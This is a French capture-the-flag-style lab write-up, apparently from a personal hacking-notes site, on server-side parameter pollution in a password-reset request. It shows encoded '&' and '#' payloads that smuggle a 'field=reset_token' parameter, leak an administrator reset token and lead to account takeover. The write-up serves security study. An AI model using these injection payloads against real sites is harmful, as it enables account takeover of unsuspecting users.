> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/api-testing/server-side-parameter-pollution-in-the-query-string.md).

# Pollution de paramètres côté serveur dans la chaîne de requête

### Exploitation de la pollution des paramètres côté serveur dans une chaîne de requête

**Objectif du labo**/ Se connecter en tant qu’administrateur puis supprimer l’utilisateur **carlos**.

#### Fonctionnalité « Mot de passe oublié »

Une fonctionnalité de réinitialisation du mot de passe est disponible.

<figure><img src="/files/1b54460ccc0a4b652315f91d96070db896d634c6" alt=""><figcaption></figcaption></figure>

La requête envoyée au serveur est la suivante :

```bash
csrf=MTAvOmFchCqpCjEEyY6azPU4tdsDvpQl&username=administrator
```

La réponse du serveur est :

```json
{
    "type":"email",
    "result":"*****@normal-user.net"
}
```

<figure><img src="/files/f0e50cfcb2716a1c186898dc7dc2c7fbac7a49f2" alt=""><figcaption></figcaption></figure>

#### Tentatives de pollution des paramètres

Essayez d’ajouter un nouveau paramètre via `&`:

```bash
csrf=MTAvOmFchCqpCjEEyY6azPU4tdsDvpQl&username=administrator&test=test
```

ou encodé :

```bash
csrf=MTAvOmFchCqpCjEEyY6azPU4tdsDvpQl&username=administrator%26test=test
```

Le serveur répond :

```json
{
    "error": "Paramètre non pris en charge."
}
```

#### En utilisant les `#` Caractère

Avec `#`, le comportement change :

```bash
csrf=MTAvOmFchCqpCjEEyY6azPU4tdsDvpQl&username=administrator#test=test
```

ou encodé :

```bash
csrf=MTAvOmFchCqpCjEEyY6azPU4tdsDvpQl&username=administrator%23test=test
```

Réponse du serveur :

```json
{
    "error": "Champ non spécifié."
}
```

Cela indique l’existence d’un **champ** paramètre attendu côté serveur.

#### Découverte du `champ` Paramètre

Envoyez la requête suivante :

```bash
csrf=MTAvOmFchCqpCjEEyY6azPU4tdsDvpQl&username=administrator&field=test
```

Ensuite, nous combinons `champ` par `#` pour injecter des valeurs supplémentaires :

```bash
csrf=MTAvOmFchCqpCjEEyY6azPU4tdsDvpQl&username=administrator&field=x#
```

ou encodé :

```bash
csrf=MTAvOmFchCqpCjEEyY6azPU4tdsDvpQl&username=administrator%26field=x%23
```

<figure><img src="/files/a17da9c20512e08d25ce03ac6b5ad5503b14c31a" alt=""><figcaption></figcaption></figure>

En testant différents **noms de variables côté serveur**, vous obtenez une réponse valide avec le code **200**, révélant les champs **email** et **le nom d'utilisateur**.

<figure><img src="/files/941ecb8d38cd3c37bf5afac23f84810e114c7ef2" alt=""><figcaption></figcaption></figure>

#### Analyse du fichier JavaScript forgot-password.js

Un fichier JavaScript accessible révèle la logique suivante :

* Les données du formulaire sont encodées manuellement.
* La requête est envoyée via `fetch` en POST.
* Si la réponse contient le `résultat` propriété, le message « Veuillez vérifier votre e-mail » s’affiche.
* Un **reset-token** le paramètre est récupéré à partir de la chaîne de requête :

```javascript
let forgotPwdReady = (callback) => {
    if (document.readyState !== "loading") callback();
    else document.addEventListener("DOMContentLoaded", callback);
}

function urlencodeFormData(fd){
    let s = '';
    function encode(s){ return encodeURIComponent(s).replace(/%20/g,'+'); }
    for(let pair of fd.entries()){
        if(typeof pair[1]=='string'){
            s += (s?'&':'') + encode(pair[0])+'='+encode(pair[1]);
        }
    }
    return s;
}

const validateInputsAndCreateMsg = () => {
    try {
        const forgotPasswordError = document.getElementById("forgot-password-error");
        forgotPasswordError.textContent = "";
        const forgotPasswordForm = document.getElementById("forgot-password-form");
        const usernameInput = document.getElementsByName("username").item(0);
        if (usernameInput && !usernameInput.checkValidity()) {
            usernameInput.reportValidity();
            return;
        }
        const formData = new FormData(forgotPasswordForm);
        const config = {
            method: "POST",
            headers: {
                "Content-Type": "x-www-form-urlencoded",
            },
            body: urlencodeFormData(formData)
        };
        fetch(window.location.pathname, config)
            .then(response => response.json())
            .then(jsonResponse => {
                if (!jsonResponse.hasOwnProperty("result"))
                {
                    forgotPasswordError.textContent = "Nom d'utilisateur invalide";
                }
                else
                {
                    forgotPasswordError.textContent = `Veuillez vérifier votre e-mail : "${jsonResponse.result}"`;
                    forgotPasswordForm.className = "";
                    forgotPasswordForm.style.display = "none";
                }
            })
            .catch(err => {
                forgotPasswordError.textContent = "Nom d'utilisateur invalide";
            });
    } catch (error) {
        console.error("Erreur inattendue :", error);
    }
}

const displayMsg = (e) => {
    e.preventDefault();
    validateInputsAndCreateMsg(e);
};

forgotPwdReady(() => {
    const queryString = window.location.search;
    const urlParams = new URLSearchParams(queryString);
    const resetToken = urlParams.get('reset-token');
    if (resetToken)
    {
        window.location.href = `/forgot-password?reset_token=${resetToken}`;
    }
    else
    {
        const forgotPasswordBtn = document.getElementById("forgot-password-btn");
        forgotPasswordBtn.addEventListener("click", displayMsg);
    }
});
```

Cela confirme l’existence d’un **jeton de réinitialisation/** paramètre.

#### En exploitant le `reset_token` Paramètre

Ce paramètre est ensuite injecté via une pollution côté serveur :

```bash
csrf=MTAvOmFchCqpCjEEyY6azPU4tdsDvpQl&username=administrator%26field=reset_token%23
```

Le serveur répond :

```json
{
    "type":"reset_token","result":"62ptz5mdgs48omh0u3uf3z7b7w9kiybt"
}
```

<figure><img src="/files/138cb76a88220e58225b63a30c0078eb5fb65dff" alt=""><figcaption></figcaption></figure>

#### Réinitialiser le mot de passe administrateur

À l'aide du jeton obtenu, vous accédez à l'URL suivante :

```bash
/forgot-password?reset_token=62ptz5mdgs48omh0u3uf3z7b7w9kiybt
```

Cela vous permet de réinitialiser le mot de passe de l'administrateur, de vous connecter avec ce compte, puis de supprimer l'utilisateur **carlos**, validant ainsi le laboratoire.

<figure><img src="/files/b269584b01b1fcd3d14dbd12383e5f5490b465b9" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/api-testing/server-side-parameter-pollution-in-the-query-string.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
